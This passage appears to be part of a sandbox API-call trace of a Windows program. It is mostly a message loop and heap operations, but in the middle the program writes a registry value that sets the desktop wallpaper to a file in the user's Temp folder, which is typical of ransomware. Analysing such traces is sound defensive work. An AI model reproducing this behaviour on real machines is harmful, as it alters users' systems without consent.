wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0247.901] Sleep (dwMilliseconds=0xa) [0247.931] timeGetTime () returned 0x117ddd1 [0247.931] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0247.931] Sleep (dwMilliseconds=0xa) [0247.947] timeGetTime () returned 0x117ddf1 [0247.947] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0247.948] Sleep (dwMilliseconds=0xa) [0247.963] timeGetTime () returned 0x117de00 [0247.963] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0247.963] Sleep (dwMilliseconds=0xa) [0247.979] timeGetTime () returned 0x117de10 [0247.979] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0247.979] Sleep (dwMilliseconds=0xa) [0247.994] timeGetTime () returned 0x117de1f [0247.994] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0247.994] Sleep (dwMilliseconds=0xa) [0248.010] timeGetTime () returned 0x117de2f [0248.010] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0248.010] Sleep (dwMilliseconds=0xa) [0248.026] timeGetTime () returned 0x117de3f [0248.026] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0248.026] Sleep (dwMilliseconds=0xa) [0248.041] timeGetTime () returned 0x117de4e [0248.041] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0248.041] Sleep (dwMilliseconds=0xa) [0248.057] timeGetTime () returned 0x117de5e [0248.057] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0248.057] Sleep (dwMilliseconds=0xa) [0248.073] timeGetTime () returned 0x117de6e [0248.073] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0248.073] Sleep (dwMilliseconds=0xa) [0248.088] timeGetTime () returned 0x117de7d [0248.088] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0248.088] Sleep (dwMilliseconds=0xa) [0248.104] timeGetTime () returned 0x117de8d [0248.104] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0248.104] Sleep (dwMilliseconds=0xa) [0248.120] timeGetTime () returned 0x117de9c [0248.120] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0248.120] Sleep (dwMilliseconds=0xa) [0248.135] timeGetTime () returned 0x117deac [0248.135] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0248.135] Sleep (dwMilliseconds=0xa) [0248.151] timeGetTime () returned 0x117debc [0248.151] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0248.151] Sleep (dwMilliseconds=0xa) [0248.182] timeGetTime () returned 0x117dedb [0248.182] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0248.182] TranslateMessage (lpMsg=0x8cf798) returned 0 [0248.182] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0248.184] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0248.210] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0248.211] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0248.211] Sleep (dwMilliseconds=0xa) [0248.237] timeGetTime () returned 0x117df12 [0248.237] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0248.237] Sleep (dwMilliseconds=0xa) [0248.260] timeGetTime () returned 0x117df29 [0248.260] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0248.260] Sleep (dwMilliseconds=0xa) [0248.276] timeGetTime () returned 0x117df39 [0248.276] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0248.276] Sleep (dwMilliseconds=0xa) [0248.291] timeGetTime () returned 0x117df48 [0248.292] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0248.292] Sleep (dwMilliseconds=0xa) [0248.350] timeGetTime () returned 0x117df77 [0248.350] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0248.350] Sleep (dwMilliseconds=0xa) [0248.370] timeGetTime () returned 0x117df96 [0248.370] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0248.370] Sleep (dwMilliseconds=0xa) [0248.385] timeGetTime () returned 0x117dfa6 [0248.385] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0248.385] Sleep (dwMilliseconds=0xa) [0248.401] timeGetTime () returned 0x117dfb6 [0248.401] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0248.401] Sleep (dwMilliseconds=0xa) [0248.416] timeGetTime () returned 0x117dfc5 [0248.416] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0248.416] Sleep (dwMilliseconds=0xa) [0248.447] timeGetTime () returned 0x117dfe4 [0248.463] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0248.464] Sleep (dwMilliseconds=0xa) [0248.511] timeGetTime () returned 0x117e023 [0248.512] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0248.512] Sleep (dwMilliseconds=0xa) [0248.557] timeGetTime () returned 0x117e052 [0248.557] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0248.557] Sleep (dwMilliseconds=0xa) [0248.575] timeGetTime () returned 0x117e062 [0248.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0248.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0248.578] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0248.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0248.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0248.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0248.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0248.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0248.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0248.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0248.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0248.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0248.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0248.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0248.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0248.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0248.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0248.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0248.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0248.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0248.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0248.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0248.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0248.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0248.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0248.585] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0248.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0248.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0248.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab650 [0248.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0248.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0248.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4d0 [0248.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0248.587] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0248.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0248.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eb318 [0248.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0248.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0248.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0248.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0248.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0248.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0248.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0248.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0248.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0248.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0248.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0248.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0248.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0248.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0248.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0248.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb318 | out: hHeap=0x2af0000) returned 1 [0248.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0248.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0248.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0248.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0248.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0248.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0248.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0248.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0248.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0248.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0248.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0248.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0248.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0248.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a73178 [0248.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0248.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0248.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0248.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0248.593] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0248.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0248.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0248.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0248.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0248.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0248.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0248.595] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x3c0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0248.595] RegSetValueExW (in: hKey=0x3c0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0248.621] RegCloseKey (hKey=0x3c0) returned 0x0 [0248.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73178 | out: hHeap=0x2af0000) returned 1 [0248.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0248.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0248.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0248.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0248.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0248.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0248.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0248.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0248.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0248.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0248.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0248.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0248.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0248.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0248.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0248.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0248.622] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0248.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0248.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0248.624] CharUpperBuffW (in: lpsz="A0F00F04C39", cchLength=0xb | out: lpsz="A0F00F04C39") returned 0xb [0248.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0248.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0248.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0248.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72338 [0248.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0248.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0248.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0248.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0248.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72348 [0248.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0248.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0248.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0248.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0248.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0248.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0248.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0248.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0248.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0248.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0248.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0248.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4d0 [0248.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0248.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0248.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0248.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0248.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0248.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0248.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0248.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0248.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0248.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0248.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0248.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0248.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0248.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab6e0 [0248.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab698 [0248.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0248.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0248.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0248.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0248.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0248.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0248.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0248.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0248.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0248.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0248.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0248.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0248.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab560 [0248.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4a0 [0248.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0248.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0248.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0248.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0248.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0248.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0248.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0248.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0248.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0248.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0248.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0248.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0248.635] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0248.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 